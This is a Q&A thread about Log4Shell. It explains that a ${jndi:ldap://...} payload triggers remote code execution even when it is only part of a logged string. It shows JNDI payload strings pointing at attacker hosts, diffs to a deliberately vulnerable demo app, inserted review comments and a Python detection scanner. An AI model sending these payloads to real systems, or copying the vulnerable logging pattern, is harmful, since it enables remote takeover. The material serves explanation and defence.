
Does the JNDI URL need to be the full string being logged or could it be just a part of a logged string?

For example, if the code contains:

paramGivenFromOutside = "${jndi:ldap://maliciousServer:1389/maliciousApp}";
logger.debug("Request: {}", paramGivenFromOutside);

Will this code be affected by the exploit?

Philipp
Lefteris E

1 Answer


Will this code be affected by the exploit?

Yes.

From LunaSec's announcement of the RCE, the line that triggers the exploit uses a parameter:[1]

// This line triggers the RCE by logging the attacker-controlled HTTP User Agent header.
// The attacker can set their User-Agent header to: ${jndi:ldap://attacker.com/a}
log.info("Request User Agent: {}", userAgent);

You can test this yourself using their reproduction steps. The example vulnerable app they link to works with both string concatenation and a parameter.[2]

You can apply this diff to that app to test it:

diff --git a/src/main/java/fr/christophetd/log4shell/vulnerableapp/MainController.java b/src/main/java/fr/christophetd/log4shell/vulnerableapp/MainController.java
index aab70c7..5b22584 100644
--- a/src/main/java/fr/christophetd/log4shell/vulnerableapp/MainController.java
+++ b/src/main/java/fr/christophetd/log4shell/vulnerableapp/MainController.java
@@ -15,7 +15,7 @@ public class MainController {
 
     @GetMapping("/")
     public String index(@RequestHeader("X-Api-Version") String apiVersion) {
-        logger.info("Received a request for API version " + apiVersion);
+        logger.info("Received a request for API version {}", apiVersion);
         return "Hello, world!";
     }
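Review bot: the `+` line changes only how the message is built, not what is logged: `apiVersion` still arrives straight from the `X-Api-Version` request header and still reaches `logger.info` unchanged, so this hunk keeps the app deliberately exploitable (which is its purpose) and must not be read as evidence that `{}` placeholders mitigate anything. A comment on the `+` line stating that it is intentionally vulnerable would stop someone copying it as a fix.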

It will also work as the full string:

diff --git a/src/main/java/fr/christophetd/log4shell/vulnerableapp/MainController.java b/src/main/java/fr/christophetd/log4shell/vulnerableapp/MainController.java
index aab70c7..c83e07e 100644
--- a/src/main/java/fr/christophetd/log4shell/vulnerableapp/MainController.java
+++ b/src/main/java/fr/christophetd/log4shell/vulnerableapp/MainController.java
@@ -15,7 +15,7 @@ public class MainController {
 
     @GetMapping("/")
     public String index(@RequestHeader("X-Api-Version") String apiVersion) {
-        logger.info("Received a request for API version " + apiVersion);
+        logger.info("{}", apiVersion);
         return "Hello, world!";
     }
 
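Review bot: this hunk is a second alternative against the same base as the first diff (`index aab70c7`, identical `-` line), not a follow-up to it, so applying it on top of the first will fail on the `-` line; the text should say the two diffs are to be applied one at a time from the original file. Logging a bare `{}` also drops all context from the message, which is fine for a reproduction but worth noting so nobody keeps it in real code.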
Whymarrh
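As an added defender-side illustration (not code from the question, the answer, or the linked test app): a small Python scanner that pulls every `${...}` lookup out of logged text, wherever it sits in the line, and flags the `jndi` prefix. It goes slightly beyond the thread by reporting any lookup prefix on request, and the sample log lines, the helper names and the `ldap.example.invalid` host are constructed placeholders.

```python
from __future__ import annotations
from dataclasses import dataclass
# Constructed sample lines from the test app's logger; ldap.example.invalid is a placeholder.
SAMPLE_LOG = [
    "INFO MainController - Received a request for API version 1.0",
    "INFO MainController - Received a request for API version ${jndi:ldap://ldap.example.invalid:1389/a}",
    "INFO MainController - ${jndi:ldap://ldap.example.invalid:1389/a}",
    "INFO MainController - Received a request for API version ${date:HH:mm}",
]

@dataclass
class Finding:
    line_no: int
    expression: str  # full ${...} text, braces included
    prefix: str      # lookup name before the first ':' (e.g. "jndi")

def extract_lookups(text: str) -> list[str]:
    """Return every top-level ${...} expression in text.

    Log4j expands lookups in the formatted message, so the expression can sit
    anywhere in the line; the whole string is scanned. Nested ${...} groups are
    tracked by brace depth (a simplified model, not Log4j's StrSubstitutor).
    """
    found, i = [], 0
    while i < len(text) - 1:
        if not text.startswith("${", i):
            i += 1
            continue
        depth, j = 0, i
        while j < len(text):
            if text.startswith("${", j):
                depth, j = depth + 1, j + 2
                continue
            if text[j] == "}":
                depth -= 1
                if depth == 0:
                    found.append(text[i:j + 1])
                    break
            j += 1
        i = j + 1
    return found

def lookup_prefix(expr: str) -> str:
    return expr[2:-1].split(":", 1)[0].lower()  # "${jndi:ldap://...}" -> "jndi"

def scan_lines(lines: list[str], flagged=("jndi",)) -> list[Finding]:
    """Flag lines containing a lookup whose prefix is in `flagged`, wherever it sits."""
    return [Finding(n, e, lookup_prefix(e)) for n, line in enumerate(lines, 1)
            for e in extract_lookups(line) if lookup_prefix(e) in flagged]
```

Both the substring form (line 2) and the full-string form (line 3) are reported, matching the answer's two diffs.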